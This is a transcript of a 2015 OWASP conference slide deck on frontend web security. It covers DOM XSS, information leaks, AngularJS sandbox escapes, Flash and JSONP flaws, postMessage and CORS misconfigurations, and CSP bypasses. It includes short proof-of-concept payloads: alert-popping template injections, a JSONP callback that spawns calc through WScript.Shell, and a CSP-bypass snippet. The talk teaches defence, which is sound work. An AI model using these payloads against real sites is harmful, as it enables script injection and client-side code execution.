owasp eee (krakow) - it's only about frontend
TRANSCRIPT
![Page 1: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/1.jpg)
It’s only about frontend
Sergey Belov
Digital Security
OWASP EEE. 6th of October 2015. Poland
![Page 2: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/2.jpg)
$ whoami
• @ Digital Security
– Penteser
– ZeroNights team
• Bug hunting (Yandex, Google, CloudFlare ...)
• Speaker – OWASP RU, BlackHat 2014, HiP 2014, ZeroNights
• Like all web related security :]
![Page 3: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/3.jpg)
What we're talking about
Frontend security
≠ client side attacks
Example – CSRF is client side attack but depend on server side
![Page 4: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/4.jpg)
What we're talking about
Some techniques are well known
but some are not
![Page 5: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/5.jpg)
What we're talking about
SOP Same Origin Policy
scheme://domain:port + hardening
![Page 6: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/6.jpg)
Cross Site Scripting
DOM
![Page 7: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/7.jpg)
DOM XSS
document.write("Site is at: " + document.location.href);
http://victim.com/action#<script>alert('xss')</script>
![Page 8: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/8.jpg)
DOM XSS
Sources document.URL location document.referrer window.name localStorage cookies …
![Page 9: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/9.jpg)
DOM XSS
Sinks eval document.write (element).innerHTML (element).src setTimeout / setInterval execScript …
https://code.google.com/p/domxsswiki/
![Page 10: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/10.jpg)
DOM XSS
![Page 11: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/11.jpg)
Information leaks
![Page 12: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/12.jpg)
Information leaks
Javascript examples testServer = host.match(/[^.]+\.((?:f|my\.XXX)\d*)\.YYY\.com/)
devServer = host.match(/^.+\.dev\.YYY\.com$/),
isXXX = testServer && testServer[1].indexOf('my.XXX') == 0,
...
internalDevHOST = '172.16.22.2';
internalProdHOST = '172.16.22.5';
...
var admin_url = '/secretArea/'
![Page 13: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/13.jpg)
Information leaks
CSS examples
file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\
/assets\/stylesheets\/application\/browser-not-supported\.scss
file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\
/assets\/stylesheets\/application\/modules\/add-category\.scss
file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\
/assets\/stylesheets\/application\/modules\/alias-preview\.scss
![Page 14: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/14.jpg)
MVC Frameworks
![Page 15: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/15.jpg)
MVC Frameworks
![Page 16: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/16.jpg)
MVC Frameworks
- Templates
- New elements <rockyou></rockyou>
- Bindings
![Page 17: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/17.jpg)
MVC Frameworks
Logic-less templates
<ul>
<li ng-repeat="phone in phones">
<span>{{phone.name}}</span>
<p>{{phone.snippet}}</p>
</li>
</ul>
![Page 18: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/18.jpg)
MVC Frameworks
Сurly braces
<ul>
<li ng-repeat="phone in phones">
<span>{{phone.name}}</span>
<p>{{phone.snippet}}</p>
</li>
</ul>
![Page 20: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/20.jpg)
MVC Frameworks Mustache Security • VueJS
• AngularJS
• CanJS
• Underscore.js
• KnockoutJS
• Ember.js
• Polymer
• Ractive.js
• jQuery
• JsRender
• Kendo UI
https://code.google.com/p/mustache-security/
![Page 21: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/21.jpg)
MVC Frameworks
AngularJS (1.1.5) – access to window
<div class="ng-app">
{{constructor.constructor('alert(1)'
)()}}
</div>
![Page 22: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/22.jpg)
MVC Frameworks
AngularJS (1.2.18) – access to window, after fix {{
(_=''.sub).call.call({}[$='constructor']
.getOwnPropertyDescriptor(_.__proto__,$)
.value,0,'alert(1)')()
}}
![Page 23: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/23.jpg)
MVC Frameworks
Frameworks updating is important for security!
![Page 24: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/24.jpg)
Flash
![Page 25: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/25.jpg)
Flash
A typical example
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80"/>
</cross-domain-policy>
![Page 26: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/26.jpg)
Flash
A non-typical example
<cross-domain-policy>
... multiple domains (some unregistered)...
</cross-domain-policy>
Real bugbounty report - $$$
![Page 27: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/27.jpg)
Flash
A non-typical example
<cross-domain-policy>
...domains from social networks (apps)...
</cross-domain-policy>
Real bugbounty report - $$$
![Page 28: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/28.jpg)
Flash
XSS via Flash
getURL(_root.URI,'_targetFrame');
and many other cases
https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008)
![Page 29: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/29.jpg)
Flash
CVE-2011-2461 IS BACK!
1) Vulnerable verson of Adobe Flex
2) Full SOP bypass
https://github.com/ikkisoft/ParrotNG/
http://blog.nibblesec.org/2015/03/the-old-is-new-again-cve-2011-2461-is.html
![Page 30: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/30.jpg)
JSONP
![Page 31: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/31.jpg)
JSONP
Typical case <script
src="http://vuln/getInfo?c=parseResponse">
</script>
![Page 32: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/32.jpg)
JSONP
No sensetive data? But Content-Type is:
• text/javascript
• application/javascript
• application/x-javascript
Try ?cb=new%20ActiveXObject(“WScript.Shell”).Exec(“calc”)//
And get client side RCE (IE only / SE is required)
![Page 33: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/33.jpg)
JSONP
http://www.youtube.com/watch?v=T0vwLsHUing
![Page 34: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/34.jpg)
HTML5 security
![Page 35: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/35.jpg)
HTML5 Security
otherWindow.postMessage(message, targetOrigin);
Window.postMessage()
window.addEventListener("message", receiveMessage, false);
function receiveMessage(event)
{
if (event.origin !== "http://example.org:8080")
return;
// ...
}
Domain A
Domain B
![Page 36: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/36.jpg)
HTML5 Security
Window.postMessage()
if(message.orgin.indexOf(".example.com")!=-1)
{
/* ... */
}
Wrong!
example.com.attacker.com
![Page 37: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/37.jpg)
HTML5 Security
otherWindow.postMessage(message, targetOrigin);
Window.postMessage()
Iframe https://accounts.google.com/b/0/ListAccounts?listPages=0&mo=1&origin=https%3A%2F%2F123123.google.com window.parent.postMessage( “... Sensetive data / user login etc...", "https:\x2F\x2F123123.google.com");
![Page 38: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/38.jpg)
HTML5 security
HTTP access control (CORS)
1) Modern
2) Secure by default
3) Very hard to make a mistake
![Page 39: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/39.jpg)
HTML5 security
HTTP access control (CORS)
Access-Control-Allow-Origin: *
![Page 40: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/40.jpg)
HTML5 security
HTTP access control (CORS)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
![Page 41: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/41.jpg)
HTML5 security
HTTP access control (CORS)
Access-Control-Allow-Origin: *
is not compatible with
Access-Control-Allow-Credentials: true
![Page 42: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/42.jpg)
HTML5 security
HTTP access control (CORS)
Access-Control-Allow-Origin: $origin;
![Page 43: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/43.jpg)
HTML5 security
WebSockets
1) No authorization and/or authentication
2) WSS:// - for sensetive data
3) Validation
4) Check origin
5) …
![Page 44: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/44.jpg)
HTML5 security
Example with websockets (Agar.IO – HTML5 game) 1) Visit Agar.IO 2) Get new server (/findServer response, some random IP) 3) Connect (ws://) to some random IP
Random IP handles only requests with valid origin (like agar.io). It can
prevent custom clients (exclude cases with full proxy on server side)
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
![Page 45: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/45.jpg)
Content Security Policy
![Page 46: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/46.jpg)
Content Security Policy
X-Content-Security-Policy:
script-src js.example.com
![Page 47: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/47.jpg)
Content Security Policy
![Page 48: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/48.jpg)
Content Security Policy
Last Firefox: security csp command
![Page 49: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/49.jpg)
Content Security Policy
@cure53 challenge – CSP bypass
• CDN with AngularJS is allowed ajax.googleapis.com
ng-app"ng-csp ng-
click=$event.view.alert(1337)>
<script src=
//ajax.googleapis.com/ajax/libs/angularjs
/1.0.8/angular.js>
</script>
https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22
![Page 50: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/50.jpg)
Extensions / SmartTV
![Page 51: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/51.jpg)
Extensions / SmarTV
- JS/HTML/CSS
- Interaction with DOM
- XHR qureies
- Extended API
![Page 52: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/52.jpg)
For dessert
![Page 53: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/53.jpg)
For dessert
<a href=“http://external.com”>Go!</a>
In headers will be
Referer: http://yoursite.com/
What about images, js, css files?
![Page 54: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/54.jpg)
For dessert
http://super-website.com/user/passRecovery?t=SECRET
...
<img src=http://comics.com/password.jpg>
...
Owner of
comics.com Can see all secret tokens
https://github.com/cure53/HTTPLeaks
![Page 55: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/55.jpg)
Anything else?
Yes: • X-Frame-Options
• Iframe protection via JS – bypassing (iframe sandboxing / race conditions)
• Switching to HTTPS (HSTS)
• DOM Clobbering (XSS - http://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream)
• Cookies (flags, domains – IE case)
• ...?
![Page 56: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/56.jpg)
Thanks!
Any questions?
@sergeybelove